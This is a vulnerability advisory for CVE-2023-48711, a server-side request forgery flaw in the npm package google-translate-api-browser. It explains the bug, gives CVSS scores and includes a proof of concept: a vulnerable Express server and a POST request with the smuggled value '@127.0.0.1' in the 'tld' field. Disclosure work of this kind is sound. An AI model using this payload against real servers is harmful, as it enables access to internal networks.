logo

Advisories

Weaknesses

Fixes

Requirements

Compliance

CVE-2023-48711 google-translate-api-browser

Package

Manager: npm
Name: google-translate-api-browser
Vulnerable Version: >=0 <4.1.0

Severity

Level: Low

CVSS v3.1: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N

CVSS v4.0: CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N

EPSS: 0.00063 pctl0.19843

Details

google-translate-api-browser Server-Side Request Forgery (SSRF) Vulnerability ### Summary A Server-Side Request Forgery (SSRF) Vulnerability is present in applications utilizing the `google-translate-api-browser` package and exposing the `translateOptions` to the end user. An attacker can set a malicious `tld`, causing the application to return unsafe URLs pointing towards local resources. ### Details The `translateOptions.tld` field is not properly sanitized before being placed in the Google translate URL. This can allow an attacker with control over the `translateOptions` to set the `tld` to a payload such as `@127.0.0.1`. This causes the full URL to become `https://translate.google.@127.0.0.1/...`, where `translate.google.` is the username used to connect to localhost. ### PoC Imagine a server running the following code (closely mimicking the code present in the package's README): ```javascript const express = require('express'); const { generateRequestUrl, normaliseResponse } = require('google-translate-api-browser'); const https = require('https'); const app = express(); app.use(express.json()); app.post('/translate', async (req, res) => { const { text, options } = req.body; const url = generateRequestUrl(text, options); https.get(url, (resp) => { let data = ''; resp.on('data', (chunk) => { data += chunk; }); resp.on('end', () => { res.json(normaliseResponse(JSON.parse(data))); }); }).on("error", (err) => { console.log("Error: " + err.message); }); }); const port = 3000; app.listen(port, () => { console.log(`Server is running on port ${port}`); }); ``` An attacker can then send the following POST request to `/translate`: ``` POST /translate HTTP/1.1 Host: localhost:3000 Content-Type: application/json Content-Length: 51 {"text":"Hello","options": {"tld": "@127.0.0.1"} } ``` This will cause a request to be sent to the localhost of the server running the Node application. ### Impact An attacker can send requests within internal networks and the local host. Should any HTTPS application be present on the internal network with a vulnerability exploitable via a GET call, then it would be possible to exploit this using this vulnerability.

Metadata

Created: 2023-11-27T23:30:14Z
Modified: 2023-11-27T23:30:14Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/11/GHSA-4233-7q5q-m7p6/GHSA-4233-7q5q-m7p6.json
CWE IDs: ["CWE-918"]
Alternative ID: GHSA-4233-7q5q-m7p6
Finding: F100
Auto approve: 1